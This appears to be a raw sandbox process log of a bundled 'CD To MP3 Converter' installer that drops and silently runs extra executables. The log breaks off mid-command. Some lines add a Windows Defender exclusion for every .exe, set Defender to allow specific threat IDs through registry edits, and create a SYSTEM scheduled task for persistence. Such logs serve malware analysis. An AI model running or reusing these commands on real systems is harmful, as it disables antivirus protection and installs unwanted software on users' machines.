"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3708 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5632 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6384 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4896 /prefetch:2

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Desktop\setup_IsfbvpBm5t.exe

"C:\Users\Admin\Desktop\setup_IsfbvpBm5t.exe"

C:\Users\Admin\AppData\Local\Temp\is-ASR24.tmp\setup_IsfbvpBm5t.tmp

"C:\Users\Admin\AppData\Local\Temp\is-ASR24.tmp\setup_IsfbvpBm5t.tmp" /SL5="$80114,6467263,56832,C:\Users\Admin\Desktop\setup_IsfbvpBm5t.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "cd_2_mp3-converter_7143"

C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe

"C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe" 7f96841ee20b006a6e65d5aef78120f8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 880

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 896

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1080

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1100

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1104

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1128

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1164

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1136

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 996

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1504

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1708

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1368

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1764

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1936

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2132

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/bboobies

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 964 -ip 964

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffae4c846f8,0x7ffae4c84708,0x7ffae4c84718

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1756

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4772 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2160

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1880

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6656 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2220

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1756

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2316

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2324

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2308

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2328

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2356

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2344

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2408

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2336

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1880

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1892

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2028

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1816

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2152

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 964 -ip 964

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2192

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 964 -ip 964

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\s2EwgBFp\dwxwHVhiKNT.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2212

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\s2EwgBFp\dwxwHVhiKNT.exe"

C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe

C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe /did=757674 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2276

C:\Users\Admin\AppData\Local\Temp\s2EwgBFp\dwxwHVhiKNT.exe

C:\Users\Admin\AppData\Local\Temp\s2EwgBFp\dwxwHVhiKNT.exe --silent --allusers=0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1768

C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe

C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe --silent --allusers=0 --server-tracking-blob=ZjQ3Y2MzOWM4ZTRkMTYyMDk0NDEwOThjNjRkODQ4ZmQzODJjZjA3OWFiYTVmMTBkMzM4NWM5MzNlMzk0NWM0Yjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInRpbWVzdGFtcCI6IjE3MjA5Nzk5NDEuMjQ2OSIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTguMC4wLjAgU2FmYXJpLzUzNy4zNiIsInV0bSI6eyJjYW1wYWlnbiI6Im9wMTMyIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiUlNUUCJ9LCJ1dWlkIjoiODkxZDBiOTUtMjM5OC00NWZkLTkxY2UtNjQxNDYyMzE5Nzg5In0=

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 964 -ip 964

C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe

C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x328,0x32c,0x330,0x304,0x334,0x71c3b1f4,0x71c3b200,0x71c3b20c

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 2204

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version

C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe

"C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4964 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240714175911" --session-guid=131e93da-5fbc-4690-a9e1-0b8588b48ff7 --server-tracking-blob=NmNlOGJiYjNkMjc5YjNlMzBjNzRiOTNiZDY2NGQ3ZDdlYmIxZGJiNDc0OGJmYTdjYjM1ODk1ZTdkZmYyZWZkNDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcyMDk3OTk0MS4yNDY5IiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiI4OTFkMGI5NS0yMzk4LTQ1ZmQtOTFjZS02NDE0NjIzMTk3ODkifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=7805000000000000

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1768

C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe

C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x320,0x324,0x334,0x2fc,0x338,0x70ceb1f4,0x70ceb200,0x70ceb20c

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bEtnHIcecDUtXwQuWS" /SC once /ST 18:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe\" z0 /FDdidE 757674 /S" /V1 /F

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 964 -ip 964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 1948

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141759111\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141759111\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141759111\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141759111\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141759111\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141759111\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.25 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x10f9f88,0x10f9f94,0x10f9fa0

C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe

C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe z0 /FDdidE 757674 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 